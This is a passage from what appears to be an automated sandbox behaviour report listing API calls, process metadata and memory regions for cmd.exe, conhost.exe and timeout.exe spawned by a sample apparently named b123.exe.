cFileName="b123.exe", cAlternateFileName="")) returned 0 [0268.339] GetLastError () returned 0x12 [0268.339] FindClose (in: hFindFile=0x6d8a08 | out: hFindFile=0x6d8a08) returned 1 [0268.340] GetProcessHeap () returned 0x6d0000 [0268.340] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d81f8) returned 1 [0268.340] GetProcessHeap () returned 0x6d0000 [0268.341] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d0a60) returned 1 [0268.341] GetProcessHeap () returned 0x6d0000 [0268.341] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d09e8) returned 1 [0268.341] GetProcessHeap () returned 0x6d0000 [0268.341] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d0a10) returned 1 [0268.341] GetProcessHeap () returned 0x6d0000 [0268.341] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6db070) returned 1 [0268.341] GetProcessHeap () returned 0x6d0000 [0268.341] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d0e88) returned 1 [0268.341] GetProcessHeap () returned 0x6d0000 [0268.342] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d0c28) returned 1 [0268.342] GetProcessHeap () returned 0x6d0000 [0268.342] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d9558) returned 1 [0268.342] GetProcessHeap () returned 0x6d0000 [0268.342] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d09a8) returned 1 [0268.342] GetProcessHeap () returned 0x6d0000 [0268.343] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d94f8) returned 1 [0268.343] GetProcessHeap () returned 0x6d0000 [0268.343] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6d0930) returned 1 [0268.343] GetConsoleTitleW (in: lpConsoleTitle=0x19f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0268.344] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0268.344] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0268.344] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0268.344] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0268.344] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0268.344] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0268.344] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0268.344] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0268.344] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0268.344] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0268.344] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0268.344] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0268.344] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0268.344] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0268.344] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0268.344] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0268.344] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0268.345] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0268.345] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0268.345] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0268.345] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0268.345] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0268.345] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0268.345] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0268.345] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0268.345] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0268.345] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0268.345] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0268.345] GetProcessHeap () returned 0x6d0000 [0268.345] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xc) returned 0x6d94c8 [0268.345] GetProcessHeap () returned 0x6d0000 [0268.345] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x12) returned 0x6d7920 [0268.345] exit (_Code=0) Thread: id = 16 os_tid = 0x4d8 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x47673000" os_pid = "0x2c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x554" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 438 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 439 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 440 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 441 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 442 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 443 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 444 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 445 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 446 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 447 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 448 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 449 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 450 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 451 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 452 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 453 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 454 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 455 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 456 start_va = 0x600000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 457 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 458 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 459 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 460 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 461 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 462 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 463 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 464 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 465 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 466 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 467 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 468 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 469 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 470 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 471 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 472 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 473 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 474 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 475 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 476 start_va = 0x600000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 477 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 478 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 479 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 480 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 481 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 482 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 483 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 484 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 485 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 486 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 487 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 488 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 489 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 492 start_va = 0x1f20000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 493 start_va = 0x2110000 end_va = 0x2446fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 494 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 495 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 496 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 497 start_va = 0x1f20000 end_va = 0x1f79fff monitored = 1 entry_point = 0x1f353f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 498 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 499 start_va = 0x2450000 end_va = 0x2663fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 500 start_va = 0x2670000 end_va = 0x2888fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 501 start_va = 0x1f20000 end_va = 0x2037fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 502 start_va = 0x2890000 end_va = 0x2aacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 503 start_va = 0x2ab0000 end_va = 0x2bc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 504 start_va = 0x660000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 505 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 506 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 507 start_va = 0x2040000 end_va = 0x20fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 508 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 509 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 510 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 511 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 512 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 513 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 514 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 515 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 516 start_va = 0x640000 end_va = 0x640fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 517 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 518 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 519 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 520 start_va = 0x6d0000 end_va = 0x6d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Thread: id = 12 os_tid = 0xe18 Thread: id = 13 os_tid = 0xf14 Thread: id = 14 os_tid = 0x3a0 Thread: id = 15 os_tid = 0xf9c Process: id = "4" image_name = "timeout.exe" filename = "c:\\windows\\syswow64\\timeout.exe" page_root = "0x33bca000" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x554" cmd_line = "timeout /t 5 " cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 530 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 531 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 532 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 533 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 534 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 535 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 536 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 537 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 538 start_va = 0x240000 end_va = 0x249fff monitored = 1 entry_point = 0x244fb0 region_type = mapped_file name = "timeout.exe" filename = "\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe") Region: id = 539 start_va = 0x250000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 540 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 541 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 542 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 543 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 544 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 545 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 546 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 547 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 548 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 549 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 550 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 551 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 552 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 553 start_va = 0x4600000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 554 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 555 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 556 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 557 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 558 start_va = 0x4250000 end_va = 0x430dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 559 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 560 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 561 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 562 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 563 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 564 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = 